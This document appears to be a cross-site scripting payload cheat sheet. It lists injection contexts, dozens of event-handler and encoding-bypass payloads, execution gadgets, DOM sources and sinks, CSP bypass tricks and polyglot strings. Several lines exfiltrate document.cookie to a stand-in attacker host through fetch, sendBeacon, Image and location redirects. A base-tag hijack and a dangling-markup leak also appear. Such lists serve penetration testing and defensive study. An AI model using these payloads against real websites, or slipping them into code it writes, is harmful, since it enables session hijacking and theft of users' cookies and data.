XSS

<!-- HTML context -->
<div>USER_INPUT</div>

<!-- Attribute context -->
<input value="USER_INPUT">
<a href="USER_INPUT">

<!-- JavaScript context -->
<script>var x = "USER_INPUT";</script>

<!-- URL context -->
<a href="https://site.com?param=USER_INPUT">

<!-- CSS context -->
<style>.class { property: USER_INPUT }</style>

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>

<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
<details open ontoggle=alert(1)>
<object data=x onerror=alert(1)>
<iframe onload=alert(1)>
<style onload=alert(1)>
<input onmouseover=alert(1) style="position:fixed;width:100%;height:100%;left:0;top:0;">

<isindex action=javascript:alert(1) type=image>
<form><button formaction=javascript:alert(1)>X</button>
<math><maction actiontype="statusline#http://evil.com" xlink:href="javascript:alert(1)">X</maction></math>
<xss style="behavior:url(xss.htc);">

" onclick=alert(1) x="
' onmouseover=alert(1) x='
" autofocus onfocus=alert(1) x="

"onmouseover=alert(1) x="
" onmouseover="alert(1)

javascript:alert(1)
javascript://comment%0aalert(1)
data:text/html,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

';alert(1);//
"-alert(1)-"
\';alert(1);//
</script><script>alert(1)</script>

${alert(1)}
`${alert(1)}`

"}</script><script>alert(1)</script>

<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
<body onload=alert(1)>
<input autofocus onfocus=alert(1)>
<marquee onstart=alert(1)>
<video><source onerror=alert(1)>
<audio src=x onerror=alert(1)>
<details open ontoggle=alert(1)>

<ScRiPt>alert(1)</sCrIpT>
<IMG SRC=x ONERROR=alert(1)>
<img src=x onerror=&#x61;&#x6c;&#x65;&#x72;&#x74;(1)>
<img src=x onerror=\u0061lert(1)>
<img src=x onerror=alert&#40;1&#41;>

<img/src=x/onerror=alert(1)>
<svg/onload=alert(1)>
<img%09src=x%09onerror=alert(1)>  <!-- Tab -->
<img%0asrc=x%0aonerror=alert(1)>  <!-- Newline -->
<img%0csrc=x%0conerror=alert(1)>  <!-- Form feed -->

alert`1`
alert.call(null,1)
alert.apply(null,[1])
[1].find(alert)
[1].map(alert)
[1].forEach(alert)
onerror=alert;throw 1
{onerror=alert}throw 1
top['al'+'ert'](1)
window['alert'](1)
eval('ale'+'rt(1)')
setTimeout('alert(1)')
setInterval('alert(1)')
Function('alert(1)')()

alert(/XSS/.source)
alert(String.fromCharCode(88,83,83))
alert(atob('WFNT'))
alert(1)
alert(document.domain)

confirm(1)
prompt(1)
console.log(1)
document.write('XSS')
window.location='http://evil.com?c='+document.cookie
fetch('http://evil.com?'+document.cookie)
navigator.sendBeacon('http://evil.com',document.cookie)

location.hash
location.search
location.href
document.URL
document.referrer
document.cookie
window.name
postMessage data
localStorage/sessionStorage

// Direct execution
eval()
Function()
setTimeout()
setInterval()
setImmediate()

// HTML injection
innerHTML
outerHTML
document.write()
document.writeln()
insertAdjacentHTML()

// URL-based
location = 
location.href =
location.assign()
location.replace()
window.open()

// jQuery specific
$().html()
$().append()
$().prepend()
$().after()
$().before()
$.parseHTML()

# Via hash
https://target.com/page#<img src=x onerror=alert(1)>
https://target.com/page#javascript:alert(1)
https://target.com/page#'-alert(1)-'

# Via URL parameter
?redirect=javascript:alert(1)
?next=data:text/html,<script>alert(1)</script>
?returnUrl=//evil.com

<script src="https://trusted-cdn.com/api/callback?c=alert(1)//"></script>
<script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1)//"></script>

<div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>
<div ng-app>{{constructor.constructor('alert(1)')()}}</div>

<base href="https://evil.com/">
<!-- All relative URLs now load from evil.com -->

<object data="data:text/html,<script>alert(1)</script>">

<img src="https://evil.com/log?
<!-- Everything until next " is exfiltrated -->

// Basic
new Image().src='http://evil.com/?c='+document.cookie;

// Fetch
fetch('http://evil.com/?c='+document.cookie);

// Beacon (works even when page closes)
navigator.sendBeacon('http://evil.com/',document.cookie);

// With encoding
fetch('http://evil.com/?c='+btoa(document.cookie));

- Search boxes
- Error messages that reflect input
- URL parameters reflected in page
- JSON responses rendered in page
- File upload (filename, metadata)
- Rich text editors (Markdown, WYSIWYG)
- Chat/messaging features
- User profile fields
- Comments/reviews
- Email templates (check headers)
- PDF generators
- Export features (CSV injection → XSS)

- 404 pages reflecting URL
- API error messages
- OAuth callback parameters
- Password reset tokens in URL
- Webhook configurations
- Custom headers (X-Forwarded-*)
- User-Agent reflection
- Referer-based redirects

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcLiCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23telerik.telerik.com/telerik.web.ui.webresource.axd>'>"><img src=x id=confirm(1) onerror=eval(id)//